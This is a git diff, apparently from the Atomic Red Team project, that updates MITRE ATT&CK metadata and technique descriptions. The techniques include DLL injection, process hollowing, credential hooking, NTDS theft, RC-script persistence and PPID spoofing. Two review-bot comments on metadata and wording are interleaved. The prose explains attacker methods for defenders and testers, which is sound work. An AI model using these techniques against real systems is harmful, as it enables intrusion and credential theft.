Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network. + + Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers) + name: Trusted Relationship + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925 + x_mitre_contributors: + - Praetorian + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'Application Log: Application Log Content' + - 'Logon Session: Logon Session Metadata' + - 'Logon Session: Logon Session Creation' x_mitre_detection: Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, 
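Review bot: T1195's x_mitre_data_sources (Web proxy, File monitoring) are removed in this hunk with no replacement list added, so after this change T1195 carries no data sources at all, while every other technique touched in this patch gets the new 'Category: Component' entries. Confirm that the upstream ATT&CK object really has no data sources rather than the generator dropping an empty or differently shaped field; the T1199 block right below shows the migrated form ('Application Log: Application Log Content', 'Logon Session: Logon Session Metadata', 'Logon Session: Logon Session Creation').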
@@ -64059,16 +67462,13 @@ initial-access: is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion. - x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs - - Application logs - - Authentication logs - - Third-party application logs - x_mitre_version: '2.0' - x_mitre_contributors: - - Praetorian + x_mitre_platforms: + - Windows + - SaaS + - IaaS + - Linux + - macOS + x_mitre_is_subtechnique: false atomic_tests: [] T1078: technique: @@ -64106,14 +67506,12 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-19T16:01:22.724Z' + modified: '2021-04-12T18:27:52.298Z' created: '2017-05-31T21:31:00.645Z' - x_mitre_version: '2.1' + x_mitre_version: '2.2' x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_defense_bypassed: - Firewall - Host intrusion prevention systems @@ -64132,16 +67530,17 @@ initial-access: - User - Administrator x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - SaaS - - Office 365 - - Azure AD + - Google Workspace + - Containers x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team - Netskope - Mark Wee - Praetorian diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 0ba59f38..60657899 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/003)
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory) -In addition to looking NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) +In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. diff --git a/atomics/T1036.003/T1036.003.md b/atomics/T1036.003/T1036.003.md index 2c0433f8..53f7811f 100644 --- a/atomics/T1036.003/T1036.003.md +++ b/atomics/T1036.003/T1036.003.md @@ -1,6 +1,6 @@ # T1036.003 - Rename System Utilities ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/003) -
Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
+
Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
## Atomic Tests diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 47a0a4c9..994659fb 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -1,8 +1,12 @@ -# T1037.004 - Rc.common +# T1037.004 - RC Scripts ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004) -
Adversaries may use rc.common automatically executed at boot initialization to establish persistence. During the boot process, macOS executes source /etc/rc.common, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated mechanism in favor of [Launch Agent](https://attack.mitre.org/techniques/T1543/001) and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) but is currently still used. +
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. -Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user. (Citation: Methods of Mac Malware Persistence)
+Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. + +Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) + +Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
## Atomic Tests diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md index 09391906..d0e78dc8 100644 --- a/atomics/T1055.001/T1055.001.md +++ b/atomics/T1055.001/T1055.001.md @@ -2,9 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/001)
Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. -DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) +DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). 
(Citation: Elastic Process Injection July 2017) -Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) +Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017) Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.
diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index b2601829..b8770a1b 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1055/012)
Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process. -Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Endgame Process Injection July 2017) +Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017) This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. 
However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.
diff --git a/atomics/T1056.004/T1056.004.md b/atomics/T1056.004/T1056.004.md index 08438dee..dfb41588 100644 --- a/atomics/T1056.004/T1056.004.md +++ b/atomics/T1056.004/T1056.004.md @@ -2,9 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/004)
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: -* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017) -* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) -* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) +* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017) +* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) +* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 
2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
## Atomic Tests diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 118bee9b..a682a7b9 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -1,10 +1,10 @@ # T1059.003 - Windows Command Shell ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/003) -
Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd.exe) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. +
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems. -Adversaries may leverage cmd.exe to execute various commands and payloads. Common uses include cmd.exe /c to execute a single command, or abusing cmd.exe interactively with input and output forwarded over a command and control channel.
+Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
## Atomic Tests diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index 95e0c187..b4f09402 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) -Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) +Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. 
VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
diff --git a/atomics/T1070.005/T1070.005.md b/atomics/T1070.005/T1070.005.md index 39a10b53..ca630c36 100644 --- a/atomics/T1070.005/T1070.005.md +++ b/atomics/T1070.005/T1070.005.md @@ -1,6 +1,6 @@ # T1070.005 - Network Share Connection Removal ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/005) -
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)
+
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the net use \\system\share /delete command. (Citation: Technet Net Use)
## Atomic Tests diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md index dac80b5c..92588a46 100644 --- a/atomics/T1070/T1070.md +++ b/atomics/T1070/T1070.md @@ -1,6 +1,6 @@ # T1070 - Indicator Removal on Host ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070) -
Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1139) and /var/log/*. +
Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.
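Review bot: the paragraph added in the T1070 hunk has a grammatical slip, "This that may compromise the integrity of security solutions" should read "This may compromise the integrity of security solutions". Because this text is regenerated from the ATT&CK description on every run of the doc generator, the fix needs to land in the upstream source rather than as a hand edit to T1070.md, or the next run will reintroduce it.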
diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index a716dae5..c2c4a3b6 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -1,6 +1,6 @@ # T1078.001 - Default Accounts ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1078/001) -
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) +
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index 0f55b4f5..f9a8e3d2 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -2,7 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1124)
An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service) -System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting.
+System time information may be gathered in a number of ways, such as with [Net](https://attack.mitre.org/software/S0039) on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. (Citation: Technet Windows Time Service) + +This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) (Citation: RSA EU12 They're Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)
## Atomic Tests diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 82b025c0..26dad271 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1127/001)
Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild) -Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into an XML project file.(Citation: MSDN MSBuild) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
+Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
## Atomic Tests diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md index f6b93d6a..5a22a3b7 100644 --- a/atomics/T1133/T1133.md +++ b/atomics/T1133/T1133.md @@ -2,7 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1133)
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. -Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
+Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. + +Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)
## Atomic Tests diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index 4e26c477..56fae58f 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1134/004)
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018) -Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) +Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an 
Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018) Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 709cdd61..4cbe849e 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1135)
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. -File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\remotesystem command. It can also be used to query shared drives on the local system using net share.
+File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\remotesystem command. It can also be used to query shared drives on the local system using net share. ## Atomic Tests diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index 787f6a7f..087753e7 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md @@ -1,10 +1,14 @@ # T1176 - Browser Extensions ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1176) -
Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition) +
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) -Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials) (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. +Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. -There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions. 
(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control (Citation: Chrome Extension C2 Malware).
+Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) + +Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. + +There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware)
## Atomic Tests diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index 4868cc10..d0b70b42 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -1,12 +1,12 @@ # T1197 - BITS Jobs ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1197) -
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations. +
